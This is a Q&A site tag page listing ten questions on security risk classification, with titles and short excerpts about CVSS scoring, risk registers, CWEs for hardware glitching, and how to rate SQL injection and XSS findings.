Questions tagged [risk-classification]
The risk-classification tag has no usage guidance.
10 questions
0
votes
0
answers
65
views
Is there an established way to classify network services by risk level?
I noticed that I seem to think of network services in three categories wrt the risk of exposing one to the internet (or a hostile network):
"Low risk" services are extensively hardened. If ...
0
votes
1
answer
213
views
Cyber resilience scoring
What would be good assessments of cyber resilience? I imagined something like a score on different topics e.g.:
Data Protection: HIGH RISK
Malware defense: MEDIUM RISK
Application/System Life Cycle: ...
- 711
1
vote
2
answers
208
views
How to create non-generic security requirements for an idea phase?
Our manager often asks us for a quick understanding of what the risks will be based on some idea that the department has been working on during the ideation phase (the business requirements are ...
- 1,294
2
votes
1
answer
1k
views
Impact of SQL injection on SELECT statement
During a routine penetration test I encountered a possibility for SQL injection. The following criteria apply:
Microsoft SQL Server (2016);
Query has to start with SELECT;
The semicolon ; is not ...
- 23
1
vote
3
answers
3k
views
Security Risk Register
Does anyone know of any good Risk Registers to start logging security risk that are found on the fly?
The problem that I am having is that we find so much in a day, things start to get lost in ...
- 31
-1
votes
3
answers
223
views
Should Risk Impact (not likelihood or overall risk) be quantified by the initial impact, or should you quantify by eventual (potential) impact [closed]
I am undertaking a risk assessment and trying to work out the risk impact on confidentiality for if a company employee (specifically a System Administrator) steals Server Hardware.
On the one hand ...
- 1
3
votes
1
answer
665
views
CVSS Score Remote or Local Scenario
I have to deal with a lot of CVSSv2 and CVSSv3 scores for many, many years. What troubles me like forever is what default attack scenario shall be defined for a vulnerability. Let's take a malicious ...
- 1,130
10
votes
3
answers
386
views
Are there any Common Weakness Entries (CWEs) applicable for hardware security weaknesses?
I can't seem to find a suitable CWE for classifying hardware-specific security weaknesses. Particularly, I'm looking for a CWE that applies to power glitching or clock glitching against a ...
- 136k
3
votes
3
answers
1k
views
Risk classification of authenticated XSS
During a security test I was wondering what the risk classification would be in an authenticated XSS vulnerability. I understand that it depends on classification schemes, so the focus in this ...
- 929
2
votes
1
answer
1k
views
Can information security risks essentially only be triaged according to the CIA triangle?
Can information security risks essentially only be triaged according to the CIA triangle (Confidentiality, Integrity and Availability) or are there other possibilities?
- 7,125